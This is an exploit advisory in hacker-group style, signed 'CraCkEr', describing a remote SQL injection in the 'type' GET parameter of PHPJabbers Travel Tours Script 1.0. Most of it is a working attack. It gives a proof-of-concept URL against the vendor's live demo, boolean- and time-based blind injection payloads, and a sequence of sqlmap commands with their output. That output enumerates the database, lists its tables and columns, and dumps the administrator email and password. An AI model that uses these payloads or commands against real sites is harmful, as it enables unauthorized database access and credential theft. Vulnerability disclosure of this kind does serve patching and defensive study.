Travel Tours Script version 1.0 suffers from a remote SQL injection vulnerability.
┌┌────────────────────────────────────────────────────────────────────────────┐
││ C r a C k E r ┌┘
┌┘ T H E C R A C K O F E T E R N A L M I G H T ││
└────────────────────────────────────────────────────────────────────────────┘┘
┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐
┌┌────────────────────────────────────────────────────────────────────────────┐
┌┘ [ Exploits ] ┌┘
└────────────────────────────────────────────────────────────────────────────┘┘
: Author : CraCkEr │ │ :
│ Website : phpjabbers.com │ │ │
│ Vendor : PHPJABBERS │ │ Travel Tours Script │
│ Software : Travel Tours Script V1.0 │ │ │
│ Vuln Type: Remote SQL Injection │ │ A content management solution for │
│ Method : GET │ │ travel agencies and tour operators │
│ Critical : High [░░▒▒▓▓██] │ │ │
│ Impact : Database Access │ │ │
│ ─────────────────────────────────────┘ └────────────────────────────────────│
│ B4nks-NET irc.b4nks.tk #unix ┌┘
└────────────────────────────────────────────────────────────────────────────┘┘
: :
│ Release Notes: │
│ ═════════════ │
│ Typically used for remotely exploitable vulnerabilities that can lead to │
│ system compromise. │
│ │
┌┌────────────────────────────────────────────────────────────────────────────┐
┌┘ Exploit URL's ┌┘
└────────────────────────────────────────────────────────────────────────────┘┘
Live Demo Site:
https://www.phpjabbers.com/travel-tours-script/#sectionDemo
POC:
https://demo.phpjabbers.com/1657840896_841/front.php?controller=pjListings&action=pjActionListings&listing_search=1&view=list&item_per_page=10&type=1'[Injection]
GET parameter 'type' is vulnerable
---
Parameter: type (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: controller=pjListings&action=pjActionListings&listing_search=1&view=list&item_per_page=10&type=1) AND 8667=8667 AND (4844=4844
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: controller=pjListings&action=pjActionListings&listing_search=1&view=list&item_per_page=10&type=1) AND (SELECT 7164 FROM (SELECT(SLEEP(5)))loCg) AND (7206=7206
---
[+] Starting the Attack
sqlmap.py -u "https://demo.phpjabbers.com/1657840896_841/front.php?controller=pjListings&action=pjActionListings&listing_search=1&view=list&item_per_page=10&type=1" --current-db --batch --random-agent --no-cast
the back-end DBMS is MySQL
web server operating system: Linux CentOS 6
web application technology: Apache 2.2.15
back-end DBMS: MySQL >= 5.0.12
[INFO] fetching current database
current database: 'pjabbers_demo_vpl'
sqlmap.py -u "https://demo.phpjabbers.com/1657840896_841/front.php?controller=pjListings&action=pjActionListings&listing_search=1&view=list&item_per_page=10&type=1" -D pjabbers_demo_vpl --tables --batch --random-agent --no-cast
[INFO] fetching tables for database: 'pjabbers_demo_vpl'
[INFO] fetching number of tables for database 'pjabbers_demo_vpl'
[INFO] resumed: 52
+------------------------------------------+
| vacationpackages_comments |
| vacationpackages_countries |
| vacationpackages_enquiries |
| vacationpackages_features |
| vacationpackages_fields |
| vacationpackages_listings_availabilities |
| vacationpackages_listings_features |
| vacationpackages_listings |
| vacationpackages_multi_lang |
| vacationpackages_notifications |
| vacationpackages_options |
| vacationpackages_payments |
| vacationpackages_periods |
| vacationpackages_plugin_country |
| vacationpackages_plugin_galleries_set |
| vacationpackages_plugin_gallery |
| vacationpackages_plugin_locale_languages |
| vacationpackages_plugin_locale |
| vacationpackages_plugin_log_config |
| vacationpackages_plugin_log |
| vacationpackages_plugin_one_admin |
| vacationpackages_plugin_paypal |
| vacationpackages_prices |
| vacationpackages_roles |
| vacationpackages_types |
| vacationpackages_users |
| vacationpackages_comments |
| vacationpackages_countries |
| vacationpackages_enquiries |
| vacationpackages_features |
| vacationpackages_fields |
| vacationpackages_listings |
| vacationpackages_listings_availabilities |
| vacationpackages_listings_features |
| vacationpackages_multi_lang |
| vacationpackages_notifications |
| vacationpackages_options |
| vacationpackages_payments |
| vacationpackages_periods |
| vacationpackages_plugin_country |
| vacationpackages_plugin_galleries_set |
| vacationpackages_plugin_gallery |
| vacationpackages_plugin_locale |
| vacationpackages_plugin_locale_languages |
| vacationpackages_plugin_log |
| vacationpackages_plugin_log_config |
| vacationpackages_plugin_one_admin |
| vacationpackages_plugin_paypal |
| vacationpackages_prices |
| vacationpackages_roles |
| vacationpackages_types |
| vacationpackages_users |
+------------------------------------------+
sqlmap.py -u "https://demo.phpjabbers.com/1657905972_980/front.php?controller=pjListings&action=pjActionListings&listing_search=1&view=list&item_per_page=10&type=1" -D pjabbers_demo_vpl -T vacationpackages_users --columns --batch --random-agent --threads 5 --no-cast
[INFO] fetching columns for table 'vacationpackages_users' in database 'pjabbers_demo_vpl'
Database: pjabbers_demo_vpl
Table: vacationpackages_users
[16 columns]
+----------------+--------------------------------------------------------+
| Column | Type |
+----------------+--------------------------------------------------------+
| contact_fax | varchar(255) |
| contact_mobile | varchar(255) |
| contact_phone | varchar(255) |
| contact_title | enum('mr','mrs','miss','ms','dr','prof','rev','other') |
| contact_url | varchar(255) |
| created | datetime |
| email | varchar(255) |
| id | int(10) unsigned |
| ip | varchar(15) |
| is_active | enum('T','F') |
| last_login | datetime |
| name | varchar(255) |
| password | blob |
| phone | varchar(255) |
| role_id | int(10) unsigned |
| status | enum('T','F') |
+----------------+--------------------------------------------------------+
sqlmap.py -u "https://demo.phpjabbers.com/1657905972_980/front.php?controller=pjListings&action=pjActionListings&listing_search=1&view=list&item_per_page=10&type=1" -D pjabbers_demo_vpl -T vacationpackages_users -C email,password --dump --batch --random-agent --threads 5 --no-cast
[INFO] fetching number of column(s) 'email,password' entries for table 'vacationpackages_users' in database 'pjabbers_demo_vpl'
Database: pjabbers_demo_vpl
Table: vacationpackages_users
[1 entry]
+-----------------+------------------------+
| email | password |
+-----------------+------------------------+
|[email protected] | P@S13rd |
+-----------------+------------------------+
[-] Done
└─────────────────────────────────────────────────────────────────────────────┘
Greets:
The_PitBull, Raz0r, iNs, Sad, His0k4, Hussin X, Mr. SQL
CryptoJob (Twitter) twitter.com/CryptozJob
┌┌────────────────────────────────────────────────────────────────────────────┐
┌┘ © CraCkEr 2022 ┌┘
└────────────────────────────────────────────────────────────────────────────┘┘
